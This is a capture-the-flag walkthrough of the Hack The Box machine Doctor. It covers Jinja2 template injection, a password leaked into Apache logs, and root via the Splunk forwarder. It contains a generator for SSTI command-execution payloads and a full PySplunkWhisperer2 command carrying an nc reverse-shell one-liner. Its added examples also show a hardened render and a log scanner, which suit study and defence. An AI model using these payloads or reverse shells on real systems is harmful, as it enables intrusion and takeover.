Doctor - Hack The Box
Introduction
Doctor is an easy Linux machine on Hack The Box. For the user part we exploit a server-side template injection (SSTI) in the web application and then dig through log files to recover a password. For the root part we abuse the Splunk Universal Forwarder, whose management service runs as root.
Enumeration
Nmap finds three open ports: 22 (SSH), 80 (HTTP) and 8089 (the Splunk management port).
The site on port 80 mentions the domain doctors.htb, so we add it to /etc/hosts to reach the virtual host.
The virtual host serves a login page; registration is open, so we create an account and log in.
Exploit the SSTI
Once logged in we can create a new post. To test for SSTI we put a small arithmetic probe such as {{7*7}} in the post and look for it being evaluated by the template engine rather than echoed back verbatim.
The page source reveals an /archive endpoint that the UI does not link to. Visiting it, the post title is rendered through the template engine and our probe has been evaluated: the injection works.
Next we swap the probe for a payload that executes a reverse-shell one-liner, with a listener waiting on our side, and catch the callback.
Reference: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
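The SSTI pattern behind this foothold, as an added example (not code from the write-up or from the box). It assumes the application is Flask/Jinja2, which the write-up does not state, and needs the jinja2 package (pip install jinja2). It shows the vulnerable render beside the hardened one, the probe check to run on the /archive response, and how the command-execution payload is built once Jinja2 is confirmed.

```python
# Added example (not code from the write-up): the Jinja2 SSTI pattern behind
# the foothold. Assumes the app is Flask/Jinja2, which the write-up does not
# state. Requires the jinja2 package (pip install jinja2).
from jinja2 import Environment, Template

PROBE = "{{ 7 * 7 }}"  # arithmetic canary: "49" in the output means the engine evaluated it


def render_vulnerable(title):
    """Vulnerable pattern: untrusted input is glued into the template *source*,
    so Jinja2 parses whatever the user typed as template code."""
    return Template("<h2>" + title + "</h2>").render()


def render_fixed(title):
    """Hardened pattern: the template source is constant and the untrusted value
    arrives through the render context, so it is data, never code. Autoescaping
    also neutralises HTML in the value for the XSS case."""
    env = Environment(autoescape=True)
    return env.from_string("<h2>{{ title }}</h2>").render(title=title)


def ssti_reflected(body, probe=PROBE):
    """Check to run on the /archive response after posting the probe: the
    evaluated result must appear and the raw probe must not."""
    return "49" in body and probe not in body


def rce_payload(cmd):
    """Command-execution payload once the probe confirms Jinja2. `cycler` is a
    Jinja2 built-in; walking its __init__ globals reaches the `os` module that
    jinja2.utils imports. Double quotes wrap the command so a shell one-liner
    with pipes and redirects (like the write-up's nc fifo shell) needs no
    extra quoting; any double quotes inside it are escaped."""
    escaped = cmd.replace('"', '\\"')
    return '{{ cycler.__init__.__globals__.os.popen("%s").read() }}' % escaped


if __name__ == "__main__":
    print(render_vulnerable(PROBE))   # <h2>49</h2>
    print(render_fixed(PROBE))        # <h2>{{ 7 * 7 }}</h2>
    print(render_vulnerable(rce_payload("id")))
```

The fix is not input filtering but keeping user data out of the template source: render_fixed never lets the value reach the parser, so the same payload comes back as inert text. If the engine turns out not to be Jinja2, the probe still tells you that something evaluated it; only rce_payload is engine-specific.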
Finding Password in Logs
Enumerating files and logs turns up something interesting in /var/log/apache2/backup: a POST to the password-reset endpoint whose email parameter carries the value 'Guitar123'. Someone evidently typed a password into the wrong field, and because the value travelled in the query string rather than the request body it was written to the access log.
The credential works for the local user shaun: switching to that account with su gives us the user flag.
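The log hunt above, as an added example that is not part of the write-up: a small scanner for an Apache combined-format access log that pulls sensitive-looking parameters out of request query strings and flags values that do not belong in the field they were sent in. SAMPLE_LOG is constructed for the demo; only the reset-password request, the email parameter and the value Guitar123 come from the write-up.

```python
# Added example (not code from the write-up): hunting for credentials that
# leaked into an Apache access log, the step that surfaced 'Guitar123'.
# SAMPLE_LOG is constructed for this demo; only the reset-password request,
# the email parameter and the value Guitar123 are taken from the write-up.
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format: client, identd, user, [timestamp], "request", status, size, "referer", "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Parameter names worth a second look when they appear in a query string.
SENSITIVE_PARAMS = {"email", "user", "username", "password", "passwd", "pass", "token", "key", "secret"}
SECRET_FIELDS = {"password", "passwd", "pass", "token", "key", "secret"}

EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")

# Constructed sample log (not the real /var/log/apache2/backup contents).
SAMPLE_LOG = """\
10.10.14.4 - - [05/Sep/2020:11:17:30 +0200] "GET /login HTTP/1.1" 200 1256 "-" "Mozilla/5.0"
10.10.14.4 - - [05/Sep/2020:11:17:34 +0200] "POST /reset_password?email=Guitar123 HTTP/1.1" 500 453 "-" "Mozilla/5.0"
10.10.14.4 - - [05/Sep/2020:11:17:40 +0200] "POST /reset_password?email=user%40example.com HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.4 - - [05/Sep/2020:11:18:01 +0200] "GET /archive HTTP/1.1" 200 1012 "-" "Mozilla/5.0"
garbage line that does not parse
"""


def parse_line(line):
    """Return the named fields of one combined-format line, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def looks_like_password(name, value):
    """Heuristic for 'typed into the wrong box': an email field that does not
    hold an email address, or any value in an explicitly secret field."""
    if name in SECRET_FIELDS:
        return True
    return name == "email" and not EMAIL_RE.match(value)


def find_leaked_params(log_text, sensitive=SENSITIVE_PARAMS):
    """Scan every request target's query string for sensitive parameter names.
    Only the query string is available: Apache does not log POST bodies, which
    is exactly why a value that belongs in the body but landed in the URL
    becomes a finding."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        for name, values in parse_qs(url.query, keep_blank_values=True).items():
            if name.lower() not in sensitive:
                continue
            for value in values:
                hits.append({
                    "ip": rec["ip"], "method": rec["method"], "path": url.path,
                    "status": rec["status"], "param": name, "value": value,
                    "suspicious": looks_like_password(name.lower(), value),
                })
    return hits


def candidate_passwords(log_text):
    """The values an attacker (or an IR analyst) would try as credentials."""
    return sorted({h["value"] for h in find_leaked_params(log_text) if h["suspicious"]})


if __name__ == "__main__":
    for hit in find_leaked_params(SAMPLE_LOG):
        print(hit)
    print("candidates:", candidate_passwords(SAMPLE_LOG))
```

The same scan is useful from the defensive side: a 500 on a reset endpoint with a non-address in the email parameter is a cheap detection for credentials landing in URLs, and the remediation is to keep such values in the request body and out of the LogFormat entirely.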
Privilege Escalation
Running linpeas.sh reveals a Splunk Universal Forwarder installed under /opt, and its management service on port 8089 runs as root. That management API accepts app deployments from any authenticated account, and a deployed app can carry a scripted input that the forwarder executes, so valid credentials for the API translate directly into command execution as root. shaun's password is reused for Splunk, and PySplunkWhisperer2 automates the whole chain: it packages a script into an app, serves it from --lhost, deploys it through port 8089 and lets the forwarder run it.
Command:
$ python PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.59 --username shaun --password Guitar123 --payload 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.59 443 >/tmp/f'
Reference: https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
Start a listener on the port named in the payload (443 here) before running the script; when the forwarder executes the deployed input we get a root reverse shell.
Thanks for reading.
Hack The Box Profile: https://www.hackthebox.eu/profile/116842